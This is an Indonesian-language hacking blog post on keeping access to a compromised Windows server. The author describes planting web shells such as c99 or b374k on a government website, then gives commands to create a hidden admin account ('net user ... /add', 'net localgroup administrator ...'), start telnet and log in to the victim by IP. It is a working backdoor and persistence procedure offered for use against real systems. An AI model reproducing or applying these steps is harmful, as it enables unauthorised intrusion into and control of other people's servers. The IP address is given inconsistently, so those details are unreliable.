Space Iklan Space Iklan Space Iklan Space Iklan

MENDAPATKAN AKSES TELNET DI SERVER KORBAN

Bookmark and Share
MENDAPATKAN AKSES TELNET DI SERVER KORBAN
Pada kesempatan kali ini saya mencoba menulis tentang hacking yang cupu abis,dimana kita mendapatkan akses ke computer  korban via telnet. Disini saya praktekkan langsung ke sebuah web pemerintahan dimana saya telah menanamkan shell backdoor disana dan server nya menggunakan windows .Tentu rekan-rekan semuanya tahu kan gunanya shell backdoor macam c99,b374k,dll,yaitu untuk jalan masuk kita apabila user dan password admin diganti sama empunya web..he hehe he,nah gimana kalau ternyata shell backdoor itu juga dihapus ma admin??waaaa…gak punya jalan masuk lagi dunk,eitss..tenang kita bisa lakukan cara yang akan saya sebutkan setelah ini…

Pertama (saya anggap temen-temen semua udah bisa masuk ke server korban entah menggunakan tehnik SQL,LFI atau tehnik lain yang udah sering di share) setelah kita masuk ke kompie korban,segera tanam shell kita,disini saya menggunakan shell b473k,lalu kita pilih “Shell” dan ketikkan perintah net user j0ck3r j0ck3r /add dan klik “go”
Penjelasan perintah diatas adalah dimana kita menciptakan user baru dengan nama “j0ck3r” dan password “j0ck3r”,ini gunanya untuk login kita nanti…
Setelah itu kita masukkan lagi perintah net localgroup administrator j0ck3r /add dan klik “go”
Maksud dari perintah diatas adalah kita menambahkan user “j0ck3r” kedalam group administrator,sehingga kita masuk sebagai admin
Setelah itu ketikkan perintah net start telnet lalu klik “go” untuk mengaktifkan telnet di computer korban,jaga-jaga aja sapa tahu service telnet nya gak aktif..he he he he
Ok deh,sekarang kita test,buka CMD rekan-rekan semua dan ketikkan telnet ( Ip korban )  disini korban saya mempunyai Ip 202.43.189.4
maka di cmd saya akan tertulis telnet 202.43.189.41 trus enter deh dan kita tunggu sebentar agar koneksi terjadi dan setelah tercipta koneksi kita pilih “y” dan login dengan user dan password yang udah kita ciptakan tadi…
 Binggo..kita sudah sukses masuk ke server korban,cek aja isinya

 
beritasehari